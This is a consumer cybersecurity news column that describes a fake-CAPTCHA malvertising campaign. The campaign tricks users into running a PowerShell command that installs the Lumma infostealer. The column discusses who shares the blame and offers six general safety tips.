When you visit a website, you may see a CAPTCHA to make sure you are a real person and not a robot. It’s usually jumbled words, some recognizable images, or just a box that says, “I’m not a robot.”
CAPTCHAs are harmless, but hackers are now using them to infect your PC with malware.
Security researchers have found a huge fake CAPTCHA campaign spreading the dangerous Lumma information-stealing malware, which can bypass security measures such as Safe Browsing.
This campaign shows how malvertising works, with over a million ad impressions every day and thousands of victims losing their accounts and money across a network of over 3,000 sites. I will explain how this scam works, who is responsible, and how you can protect yourself.
Illustration of a scammer (Kurt “CyberGuy” Knutsson)
How does the scam work?
As reported by Guardio, The fake CAPTCHA scam is a sophisticated malvertising campaign that entices you to unknowingly install malware under the guise of a routine CAPTCHA verification. The cyber attack begins when you browse websites, often those that offer free streaming, downloads or pirated content. Hackers use these sites to present you with what appears to be a legitimate CAPTCHA verification page.
WHAT IS ARTIFICIAL INTELLIGENCE (AI)?
The page imitates a real CAPTCHA and asks you to confirm that you are human. However, the instructions are designed to trick you into initiating harmful actions, such as activating the Windows “Run” dialog box. Users unknowingly paste and execute a crafted PowerShell command, which silently installs the Lumma information-stealing malware on their system.
The malware targets sensitive data, including social media accounts, banking credentials, saved passwords, and personal files, which could lead to identity and financial theft.
Fake CAPTCHA Illustration (Guard)
HERE’S WHAT RUTHLESS HACKERS STOLEN FROM 110 MILLION AT&T CUSTOMERS
Who is to blame for this?
The fake CAPTCHA scam shows how messed up the Internet advertising system has become, with everyone involved passing the buck. Guardio Labs points to ad networks like Monetag as a big part of the problem. They distribute malicious ads that are disguised during moderation using tricks such as cloaking. Publishers, especially those offering free or pirated content, compound the problem by posting these shady ads on their sites, often without verifying what they are actually showing users.
Then there are services like BeMob, which allows scammers to hide their bad links behind harmless-looking URLs. These companies call themselves analytics tools, but they help scams stay hidden. Hosting providers do not escape blame either. It is where these fake CAPTCHA pages live and often do not bother to check what is being hosted.
Of course, the scammers themselves are the ones pulling the strings. But because they spread their operations across so many platforms, it is almost impossible to track them. Guardio’s research shows how all of these moving parts work together, creating a system where no one takes responsibility and the scams continue.
GET FOX BUSINESS ON THE GO BY CLICKING HERE
Illustration of a scammer at work (Kurt “CyberGuy” Knutsson)
BE CAREFUL WITH ENCRYPTED PDFS AS THE LAST TRICK TO DELIVER YOU MALWARE
6 Ways to Stay Safe from Fake CAPTCHAs
1. Use reliable security software: Keeping your antivirus and anti-malware software up to date is one of the most effective ways to protect yourself from fake CAPTCHA scams. Powerful antivirus software will detect and block malware like the Lumma infostealer before it can infect your device. Get my picks for the best antivirus protection winners of 2024 for your Windows, Mac, Android, and iOS devices.
2. Enable browser protection features: Modern browsers offer built-in security features, such as safe browsing and phishing protection, that warn you about potentially dangerous sites. Make sure these features are enabled in your browser settings. These tools can alert you to malicious links or fake CAPTCHAs that try to trick you into downloading malware.
3. Be careful with “free” content: There is a saying that goes: “If something is free, you are what they sell.” Websites that offer free downloads, streaming services, or pirated content are often associated with malvertising campaigns. Fake CAPTCHA scams are commonly spread through these types of sites, where users are tricked into clicking on malicious ads or links. Even if a site looks tempting, it’s important to be careful. Avoid clicking on suspicious links or using “free” services, as these could be traps designed to infect your device with malware.
4. Avoid clicking on suspicious ads: Always be wary of ads that appear out of nowhere or that seem too good to be true. Fake CAPTCHA scams often disguise themselves as legitimate ads and ask you to click to verify that you are human. Never interact with pop-up ads or unknown banners, especially those that claim to offer you something for free, as they may lead to malicious pages or cause malware downloads. Get my picks for the best antivirus protection winners of 2024 for your Windows, Mac, Android, and iOS devices.
5. Check HTTPS and look for signs of a legitimate site: Before entering any personal information or interacting with a CAPTCHA, make sure the website is secure. Look for ” in the website URL, which indicates that the connection is encrypted. Legitimate websites also tend to have a professional appearance, so if something doesn’t work or the design looks poor, trust your instincts and leave the site. place.
6. Enable two-factor authentication: Two-factor authentication adds an extra layer of security, making it difficult for attackers to access your accounts.
WHAT TO DO IF YOUR BANK ACCOUNT IS HACKED
Kurt’s Key Takeaway
There is no doubt that fake CAPTCHA scams are a growing threat, putting millions of us at risk of malware infections and financial loss. What’s even more worrying is that ad networks, publishers, and hosting services continue to allow malicious campaigns to spread across their platforms despite widespread awareness of the issue. The companies involved should take immediate steps to improve content moderation, strengthen security measures, and prevent these scams from thriving. We are seeing a dangerous loophole in the digital advertising ecosystem that could have serious consequences for internet users.
CLICK HERE TO GET THE FOX NEWS APP
Do you think ad networks and publishers should be responsible for the spread of malware across their platforms? Let us know by writing to us at Cyberguy.com/Contact.
For more tech tips and security alerts, sign up for my free CyberGuy Report newsletter by heading to Cyberguy.com/Newsletter.
Ask Kurt a question or tell us what stories you’d like us to cover..
Follow Kurt on his social channels:
Answers to the most frequently asked questions about CyberGuy:
New from Kurt:
Copyright 2024 CyberGuy.com. All rights reserved.
